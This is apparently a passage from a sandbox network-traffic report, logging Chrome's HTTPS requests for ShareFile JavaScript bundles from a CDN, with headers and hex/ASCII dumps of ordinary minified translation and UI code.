                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 6e 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 3d 6e 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 7c 7c 5b 5d 2c 6e 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 2e 70 75 73 68 28 74 29 7d 29 29 2c 74 68 69 73 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 26 26 28 74 3f 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 3d 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 74 7d 29 29 3a 64 65 6c 65 74 65 20 74 68 69 73 2e 6f 62 73
                                                                                                                                                                                                                                                                                Data Ascii: n=this;return e.split(" ").forEach((function(e){n.observers[e]=n.observers[e]||[],n.observers[e].push(t)})),this}},{key:"off",value:function(e,t){this.observers[e]&&(t?this.observers[e]=this.observers[e].filter((function(e){return e!==t})):delete this.obs
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 29 7d 7d 5d 2c 5b 7b 6b 65 79 3a 22 68 61 73 44 65 66 61 75 6c 74 56 61 6c 75 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 64 65 66 61 75 6c 74 56 61 6c 75 65 22 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6e 29 26 26 74 3d 3d 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 32 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 5b 6e 5d 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 7d 5d 29 2c 6e 7d 28 7a 72 29 3b 66 75 6e 63 74 69 6f 6e 20 75 69 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 65 2e 73 6c 69 63 65 28 31 29 7d 76
                                                                                                                                                                                                                                                                                Data Ascii: )}}],[{key:"hasDefaultValue",value:function(e){var t="defaultValue";for(var n in e)if(Object.prototype.hasOwnProperty.call(e,n)&&t===n.substring(0,12)&&void 0!==e[n])return!0;return!1}}]),n}(zr);function ui(e){return e.charAt(0).toUpperCase()+e.slice(1)}v
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 4c 69 28 74 29 2c 61 3d 73 2e 66 6f 72 6d 61 74 4e 61 6d 65 2c 6f 3d 73 2e 66 6f 72 6d 61 74 4f 70 74 69 6f 6e 73 3b 69 66 28 69 2e 66 6f 72 6d 61 74 73 5b 61 5d 29 7b 76 61 72 20 6c 3d 65 3b 74 72 79 7b 76 61 72 20 64 3d 72 26 26 72 2e 66 6f 72 6d 61 74 50 61 72 61 6d 73 26 26 72 2e 66 6f 72 6d 61 74 50 61 72 61 6d 73 5b 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 6b 65 79 5d 7c 7c 7b 7d 2c 63 3d 64 2e 6c 6f 63 61 6c 65 7c 7c 64 2e 6c 6e 67 7c 7c 72 2e 6c 6f 63 61 6c 65 7c 7c 72 2e 6c 6e 67 7c 7c 6e 3b 6c 3d 69 2e 66 6f 72 6d 61 74 73 5b 61 5d 28 65 2c 63 2c 4d 69 28 4d 69 28 4d 69 28 7b 7d 2c 6f 29 2c 72 29 2c 64 29 29 7d 63 61 74 63 68 28 65 29 7b 69 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 65 29 7d 72 65 74 75 72 6e 20 6c 7d 72 65 74 75 72 6e 20 69 2e
                                                                                                                                                                                                                                                                                Data Ascii: Li(t),a=s.formatName,o=s.formatOptions;if(i.formats[a]){var l=e;try{var d=r&&r.formatParams&&r.formatParams[r.interpolationkey]||{},c=d.locale||d.lng||r.locale||r.lng||n;l=i.formats[a](e,c,Mi(Mi(Mi({},o),r),d))}catch(e){i.logger.warn(e)}return l}return i.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 6e 67 74 68 29 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 3a 20 69 31 38 6e 2e 6c 61 6e 67 75 61 67 65 73 20 77 65 72 65 20 75 6e 64 65 66 69 6e 65 64 20 6f 72 20 65 6d 70 74 79 22 2c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 73 29 2c 21 31 3b 76 61 72 20 72 3d 74 68 69 73 2e 72 65 73 6f 6c 76 65 64 4c 61 6e 67 75 61 67 65 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 73 5b 30 5d 2c 69 3d 21 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 61 6c 6c 62 61 63 6b 4c 6e 67 2c 73 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 73 5b 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 2d 31 5d 3b 69 66 28 22 63 69 6d 6f 64 65 22 3d 3d 3d
                                                                                                                                                                                                                                                                                Data Ascii: ngth)return this.logger.warn("hasLoadedNamespace: i18n.languages were undefined or empty",this.languages),!1;var r=this.resolvedLanguage||this.languages[0],i=!!this.options&&this.options.fallbackLng,s=this.languages[this.languages.length-1];if("cimode"===


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                98192.168.2.64982413.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC602OUTGET /sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 262562
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 15:31:51 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0d0a56254a42d9b0ca24878e2ce733be"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 b6d1611761652d7a383651f2bf480596.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 1BGMZ_RPdXoyTl9qojWSwImVqEOmJMS5Xe4KkVTSqlJmQ1pKyXuIFg==
                                                                                                                                                                                                                                                                                Age: 37658
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 71 75 65 73 74 6c 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};re
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16207INData Raw: 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 77 7c 7c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 62 29 29 7b 69 66 28 21 74 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 7c 7c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 61 63 63 65 73 73 69 6e 67 20 61 6e 20 6f 62 6a 65 63 74 20 2d 20 62 75 74 20 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 20 6f 70 74 69 6f 6e 73 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 21 22 29 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f
                                                                                                                                                                                                                                                                                Data Ascii: ("string"!=typeof w||"[object Array]"!==b)){if(!t.returnObjects&&!this.options.returnObjects){this.options.returnedObjectHandler||this.logger.warn("accessing an object - but returnObjects options is not enabled!");var k=this.options.returnedObjectHandler?
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 73 2e 73 75 66 66 69 78 3d 74 2e 73 75 66 66 69 78 3f 50 28 74 2e 73 75 66 66 69 78 29 3a 74 2e 73 75 66 66 69 78 45 73 63 61 70 65 64 7c 7c 22 7d 7d 22 2c 74 68 69 73 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3d 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3f 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 3a 74 2e 66 6f 72 6d 61 74 53 65 70 61 72 61 74 6f 72 7c 7c 22 2c 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3d 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 7c 7c 22 2d 22 2c 74 68 69 73 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 3d 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 3f 22 22 3a 74 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 7c 7c
                                                                                                                                                                                                                                                                                Data Ascii: s.suffix=t.suffix?P(t.suffix):t.suffixEscaped||"}}",this.formatSeparator=t.formatSeparator?t.formatSeparator:t.formatSeparator||",",this.unescapePrefix=t.unescapeSuffix?"":t.unescapePrefix||"-",this.unescapeSuffix=this.unescapePrefix?"":t.unescapeSuffix||
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16016INData Raw: 2c 73 69 6d 70 6c 69 66 79 50 6c 75 72 61 6c 53 75 66 66 69 78 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 6d 70 6c 69 66 79 50 6c 75 72 61 6c 53 75 66 66 69 78 7d 29 2c 21 69 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 21 3d 3d 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 7c 7c 28 63 2e 66 6f 72 6d 61 74 74 65 72 3d 6f 28 69 29 2c 63 2e 66 6f 72 6d 61 74 74 65 72 2e 69 6e 69 74 28 63 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 66 6f 72 6d 61 74 3d 63 2e 66 6f 72 6d 61 74 74 65 72 2e 66
                                                                                                                                                                                                                                                                                Data Ascii: ,simplifyPluralSuffix:this.options.simplifyPluralSuffix}),!i||this.options.interpolation.format&&this.options.interpolation.format!==r.interpolation.format||(c.formatter=o(i),c.formatter.init(c,this.options),this.options.interpolation.format=c.formatter.f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 6b 65 28 4f 62 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 77 65 28 65 2c 74 2c 6e 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 6b 65 28 4f 62 6a 65 63 74 28 6e 29
                                                                                                                                                                                                                                                                                Data Ascii: function(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?ke(Object(n),!0).forEach((function(t){we(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):ke(Object(n)
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 71 75 69 72 65 64 7c 66 69 6c 6c 7c 66 69 6c 6c 4f 70 61 63 69 74 79 7c 66 69 6c 6c 52 75 6c 65 7c 66 69 6c 74 65 72 7c 66 69 6c 74 65 72 52 65 73 7c 66 69 6c 74 65 72 55 6e 69 74 73 7c 66 6c 6f 6f 64 43 6f 6c 6f 72 7c 66 6c 6f 6f 64 4f 70 61 63 69 74 79 7c 66 6f 63 75 73 61 62 6c 65 7c 66 6f 6e 74 46 61 6d 69 6c 79 7c 66 6f 6e 74 53 69 7a 65 7c 66 6f 6e 74 53 69 7a 65 41 64 6a 75 73 74 7c 66 6f 6e 74 53 74 72 65 74 63 68 7c 66 6f 6e 74 53 74 79 6c 65 7c 66 6f 6e 74 56 61 72 69 61 6e 74 7c 66 6f 6e 74 57 65 69 67 68 74 7c 66 6f 72 6d 61 74 7c 66 72 6f 6d 7c 66 72 7c 66 78 7c 66 79 7c 67 31 7c 67 32 7c 67 6c 79 70 68 4e 61 6d 65 7c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 48 6f 72 69 7a 6f 6e 74 61 6c 7c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f
                                                                                                                                                                                                                                                                                Data Ascii: quired|fill|fillOpacity|fillRule|filter|filterRes|filterUnits|floodColor|floodOpacity|focusable|fontFamily|fontSize|fontSizeAdjust|fontStretch|fontStyle|fontVariant|fontWeight|format|from|fr|fx|fy|g1|g2|glyphName|glyphOrientationHorizontal|glyphOrientatio
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 6c 70 3a 28 29 3d 3e 56 2c 63 42 3a 28 29 3d 3e 7a 2c 51 44 3a 28 29 3d 3e 55 2c 74 35 3a 28 29 3d 3e 57 2c 56 57 3a 28 29 3d 3e 47 7d 29 3b 76 61 72 20 72 2c 6f 2c 61 2c 69 3d 6e 28 39 33 34 33 33 29 2c 73 3d 6e 28 31 35 36 37 31 29 2c 63 3d 6e 28 34 33 31 34 34 29 2c 75 3d 6e 28 39 37 33 32 36 29 2c 6c 3d 6e 28 36 30 31 33 36 29 2c 64 3d 6e 28 32 39 33 38 38 29 2c 66 3d 6e 28 34 39 34 32 29 2c 70 3d 6e 28 31 34 31 33 29 2c 6d 3d 6e 28 35 39 35 34 29 2c 68 3d 6e 28 34 32 36 31 30 29 2c 67 3d 6e 28 31 32 36 36 36 29 2c 76 3d 6e 28 33 33 37 38 30 29 2c 79 3d 6e 28 36 37 37 33 36 29 2c 62 3d 6e 28 33 30 31 36 38 29 2c 77 3d 6e 28 37 30 39 31 37 29 2c 49 3d 6e 28 39 33 38 36 37 29 2c 6b 3d 6e 28 34 39 39 37 34 29 2c 45 3d
                                                                                                                                                                                                                                                                                Data Ascii: ict";n.d(t,{lp:()=>V,cB:()=>z,QD:()=>U,t5:()=>W,VW:()=>G});var r,o,a,i=n(93433),s=n(15671),c=n(43144),u=n(97326),l=n(60136),d=n(29388),f=n(4942),p=n(1413),m=n(5954),h=n(42610),g=n(12666),v=n(33780),y=n(67736),b=n(30168),w=n(70917),I=n(93867),k=n(49974),E=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 61 32 2e 30 37 32 20 32 2e 30 37 32 20 30 20 30 30 30 20 32 2e 39 32 39 6c 39 2e 39 32 38 20 39 2e 39 32 38 63 2e 38 31 2e 38 30 38 20 32 2e 31 32 2e 38 30 38 20 32 2e 39 33 20 30 6c 39 2e 39 32 38 2d 39 2e 39 32 38 61 32 2e 30 37 32 20 32 2e 30 37 32 20 30 20 30 30 30 2d 32 2e 39 33 5a 4d 31 31 2e 30 33 34 20 36 2e 32 31 37 61 31 2e 30 33 36 20 31 2e 30 33 36 20 30 20 31 31 32 2e 30 37 32 20 30 76 36 2e 32 31 35 61 31 2e 30 33 36 20 31 2e 30 33 36 20 30 20 31 31 2d 32 2e 30 37 32 20 30 56 36 2e 32 31 37 5a 6d 31 2e 30 38 39 20 31 31 2e 39 32 32 68 2d 2e 30 32 39 61 31 2e 35 38 34 20 31 2e 35 38 34 20 30 20 30 31 2d 31 2e 35 37 36 2d 31 2e 35 32 33 20 31 2e 35 32 37 20 31 2e 35 32 37 20 30 20 30 31 31 2e 35 2d 31 2e 35 38 34 68 2e 30 32 38 61 31 2e 35 38
                                                                                                                                                                                                                                                                                Data Ascii: a2.072 2.072 0 000 2.929l9.928 9.928c.81.808 2.12.808 2.93 0l9.928-9.928a2.072 2.072 0 000-2.93ZM11.034 6.217a1.036 1.036 0 112.072 0v6.215a1.036 1.036 0 11-2.072 0V6.217Zm1.089 11.922h-.029a1.584 1.584 0 01-1.576-1.523 1.527 1.527 0 011.5-1.584h.028a1.58
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 44 43 4d 20 66 69 6c 65 22 2c 44 77 67 49 63 6f 6e 3a 22 44 57 47 20 66 69 6c 65 22 2c 45 6d 61 69 6c 49 63 6f 6e 3a 22 45 6d 61 69 6c 20 66 69 6c 65 22 2c 45 6d 70 74 79 34 30 34 49 63 6f 6e 3a 22 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 41 70 70 73 49 63 6f 6e 3a 22 41 70 70 6c 69 63 61 74 69 6f 6e 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 3a 22 43 6f 6d 6d 65 6e 74 73 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 43 6f 6d 70 6c 65 74 65 49 63 6f 6e 3a 22 41 6c 6c 20 69 74 65 6d 73 20 63 6f 6d 70 6c 65 74 65 64 20 69 6c 6c 75 73 74 72 61 74 69 6f 6e 22 2c 45 6d 70 74 79 43 6f 6d 70 75 74 65 72 49 63 6f 6e 3a 22 43 6f 6d 70 75
                                                                                                                                                                                                                                                                                Data Ascii: DCM file",DwgIcon:"DWG file",EmailIcon:"Email file",Empty404Icon:"File not found illustration",EmptyAppsIcon:"Application illustration",EmptyCommentsIcon:"Comments illustration",EmptyCompleteIcon:"All items completed illustration",EmptyComputerIcon:"Compu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 75 70 65 72 69 6f 72 65 20 61 20 7b 7b 76 61 6c 75 65 7d 7d 2e 22 2c 65 6e 74 65 72 5f 72 65 71 75 69 72 65 64 5f 76 61 6c 75 65 3a 22 51 75 65 73 74 6f 20 63 61 6d 70 6f 20 c3 a8 20 6f 62 62 6c 69 67 61 74 6f 72 69 6f 2e 22 2c 65 6e 74 65 72 5f 73 6d 61 6c 6c 65 72 5f 76 61 6c 75 65 3a 22 49 6d 6d 65 74 74 65 72 65 20 75 6e 20 76 61 6c 6f 72 65 20 70 61 72 69 20 6f 20 69 6e 66 65 72 69 6f 72 65 20 61 20 7b 7b 76 61 6c 75 65 7d 7d 2e 22 2c 65 6e 74 65 72 5f 76 61 6c 69 64 5f 64 69 67 69 74 3a 22 49 6d 6d 65 74 74 65 72 65 20 75 6e 61 20 63 69 66 72 61 22 2c 65 78 63 65 65 64 5f 6d 61 78 5f 63 68 61 72 73 3a 22 49 6c 20 6d 65 73 73 61 67 67 69 6f 20 68 61 20 72 61 67 67 69 75 6e 74 6f 20 69 6c 20 6c 69 6d 69 74 65 20 64 69 20 63 61 72 61 74 74 65 72 69 2e
                                                                                                                                                                                                                                                                                Data Ascii: uperiore a {{value}}.",enter_required_value:"Questo campo obbligatorio.",enter_smaller_value:"Immettere un valore pari o inferiore a {{value}}.",enter_valid_digit:"Immettere una cifra",exceed_max_chars:"Il messaggio ha raggiunto il limite di caratteri.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                99192.168.2.64981813.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC603OUTGET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 133462
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 18:05:42 GMT
                                                                                                                                                                                                                                                                                ETag: "339b13b91ce8cf7cad214117ea302b1f"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 37c215a6cf8b04439db2f97a633421e6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 6da5A_kNbxtxL0iXi2WL0JPXKgxadq22qRckrU1KcII1Rbj6zjGQKg==
                                                                                                                                                                                                                                                                                Age: 45977
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 79 6e 61 6d 69 63 66 6f 72 6d 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineP
